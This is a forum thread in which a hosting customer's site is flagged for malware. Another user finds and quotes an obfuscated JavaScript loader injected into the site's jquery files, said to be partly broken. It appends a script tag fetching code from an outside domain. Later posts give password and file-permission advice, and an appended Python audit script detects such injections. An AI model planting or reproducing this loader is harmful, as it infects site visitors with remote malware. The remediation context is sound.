My x10 hosted site marked as "distributing malware" by Google!

Status
Not open for further replies.

azamkandy

Since yesterday my site has been reported as a malware-distributing site by Google! I reviewed my index.html but I couldn't find anything, so I submitted it to Google again. The result was:

Status of the last badware appeal for this site:
A review for this site has finished. The site was found to still be dangerous for users. Please review your site again. When you are confident that you have cleaned and secured your site, please request another review. Sample URLs that were problematic during this review:

Any help much appreciated!

Thanks.
 

adverlab

Open your site in Google Chrome.

You will get the names of the malware sites; just remove those from your HTML.
 

galaxyAbstractor

I tried visiting your site in IE, and it's downloading a trojan inside a PDF from that bluejacking.ru domain.

The virus resides in the jquery.curvycorners.source.js file, and this file should immediately be removed.

/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id', 'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)n&-$@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-)$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^:(!8&#0$8^!!0#@$/@^#n^$o#&!v@!!i@#@n)k))y!(#.@$c(u@!n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d(!$!@p)!r@@$e)$s&#s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|\)|@|#|\(|\^/ig, ''));X08yhffhg7xkxf.setAttribute('defer', 'defer');document.body.appendChild(X08yhffhg7xkxf);}} catch(e) {}
That code should be removed (I've removed parts of it to break functionality so no script kiddie would use it).
 

azamkandy

Thanks vigge_sWe,

I found the same kind of code in 4 .js files and I removed the code from them.

And I'm just wondering how someone can edit that .js file?
 

Gouri

And I'm just wondering how someone can edit that .js file?

What are the permissions set on this .js file?

Check the permissions on all other files too.
 

galaxyAbstractor

Thanks vigge_sWe,

I found the same kind of code in 4 .js files and I removed the code from them.

And I'm just wondering how someone can edit that .js file?

Did you download them from the same site? If so, there could be a small chance that they were already infected when you downloaded them. Otherwise, they could have known your password, so I suggest you change it.
 

azamkandy

Awesome stuff. I checked everything and changed passwords; all works fine now.
Hmm... Twitter has been hacked by cyber army, so no wonder!
Edit:
What are the permissions set on this .js file?

Check the permissions on all other files too.

Cheers,

I changed everything to 555. What is the best, you reckon?
And the link to Free Google Wave invites --> HERE
has got two "http://"s in front...
 

misson

I changed everything to 555. What is the best, you reckon?
JS files should be 644, though you could probably use 600. Only directories and scripts that need a shebang line (e.g. CGI scripts) need execute permissions. Scripts handled by Apache (e.g. PHP) or the browser (e.g. JS) aren't executed as commands and don't need shebang lines or execute permissions. Moreover, your virtual site server should run under your user credentials, so you should be able to remove all group and "others" permissions without breaking your site (but test this first).
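
Added example, not part of the thread or written by any of its posters: a Python audit of a web root that flags .js files carrying the kind of injected loader quoted earlier and .js files whose mode goes against the permission advice above. The regex heuristics, the function names and the inert sample string are assumptions constructed for illustration.

```python
import os
import re
import stat

# Heuristic modelled on the injected line quoted in the thread (an assumption,
# not a complete signature): a <script> element created at runtime whose 'src'
# is a long junk-padded string cleaned up by .replace().
DYNAMIC_SCRIPT = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")
SRC_VIA_REPLACE = re.compile(
    r"setAttribute\(\s*['\"]src['\"]\s*,\s*(['\"])[^'\"]{20,}\1\s*\.replace\(")

# Constructed, inert sample with the same shape (decodes to example.invalid).
SAMPLE_INJECTED = (
    "try{window.onload=function(){var x=document.createElement('script');"
    "x.setAttribute('src','h#t@t!p:#/@/e!x#a@m!p#l@e.i!n#v@a!l#i@d/'"
    ".replace(/#|@|!/g,''));document.body.appendChild(x);}}catch(e){}"
)


def looks_injected(text):
    """True when both markers of the quoted injection appear in the text."""
    return bool(DYNAMIC_SCRIPT.search(text) and SRC_VIA_REPLACE.search(text))


def mode_problems(path):
    """Flag modes that go against the advice above for static .js files."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    problems = []
    if mode & 0o022:
        problems.append("group/other writable")
    if mode & 0o111:
        problems.append("execute bit on static file")
    return problems


def audit(webroot):
    """Return {relative path: [findings]} for each .js file under webroot."""
    report = {}
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if not name.endswith(".js"):
                continue
            path = os.path.join(dirpath, name)
            findings = mode_problems(path)
            with open(path, encoding="utf-8", errors="replace") as fh:
                if looks_injected(fh.read()):
                    findings.append("injected script loader")
            if findings:
                report[os.path.relpath(path, webroot)] = findings
    return report
```

A file set to 555, as mentioned in the thread, is reported for its execute bits; a clean file at 644 produces no finding.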
 